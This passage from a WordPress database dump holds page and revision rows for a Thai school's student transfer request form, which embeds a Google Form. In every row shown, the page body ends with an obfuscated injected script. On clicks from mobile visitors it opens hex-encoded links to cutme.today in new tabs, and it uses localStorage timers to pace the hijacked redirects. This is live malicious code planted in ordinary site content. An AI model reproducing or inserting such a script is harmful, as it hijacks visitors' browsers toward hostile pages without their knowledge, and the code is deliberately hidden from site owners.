_0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-08 15:01:05','2024-08-08 08:01:05','',459,'http://pakhaeng.ssk.in.th/?p=697',0,'revision','',0),
(699,1,'2024-08-08 15:01:34','2024-08-08 08:01:34','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"882f61c5\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-882f61c5 gb-headline-text\">แบบคำขอการย้ายนักเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:paragraph -->\n<p>กรอกข้อมูล ในแบบฟอร์ม ให้ครบถ้วน แล้วทางโรงเรียนจะติดต่อกลับเพื่อ มารับคำขอย้ายโรงเรียน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>หมายเหตุ : กรอกข้อมูลไม่ครบถ้วน ไม่รับพิจารณาขอย้าย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://docs.google.com/forms/d/e/1FAIpQLSfTrFBwCoHyb8ISwfCACpe5sKpc1iodVua4jH3_yiG0DL0AEA/viewform?embedded=true\" width=\"1500\" height=\"600\" frameborder=\"0\" marginheight=\"0\" marginwidth=\"0\">กำลังโหลด…</iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-08 15:01:34','2024-08-08 08:01:34','',459,'http://pakhaeng.ssk.in.th/?p=699',0,'revision','',0),
(700,1,'2024-08-08 15:04:28','2024-08-08 08:04:28','<!-- wp:paragraph -->\n<p>กรอกข้อมูล ในแบบฟอร์ม ให้ครบถ้วน แล้วทางโรงเรียนจะติดต่อกลับเพื่อ มารับคำขอย้ายโรงเรียน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>หมายเหตุ : กรอกข้อมูลไม่ครบถ้วน ไม่รับพิจารณาขอย้าย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://docs.google.com/forms/d/e/1FAIpQLSfTrFBwCoHyb8ISwfCACpe5sKpc1iodVua4jH3_yiG0DL0AEA/viewform?embedded=true\" width=\"1500\" height=\"600\" frameborder=\"0\" marginheight=\"0\" marginwidth=\"0\">กำลังโหลด…</iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แบบคำขอการย้ายนักเรียน','','publish','closed','closed','','%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%84%e0%b8%b3%e0%b8%82%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%89%e0%b8%b2%e0%b8%a2%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99','','','2024-08-08 15:04:30','2024-08-08 08:04:30','',0,'http://pakhaeng.ssk.in.th/?page_id=700',0,'page','',0),
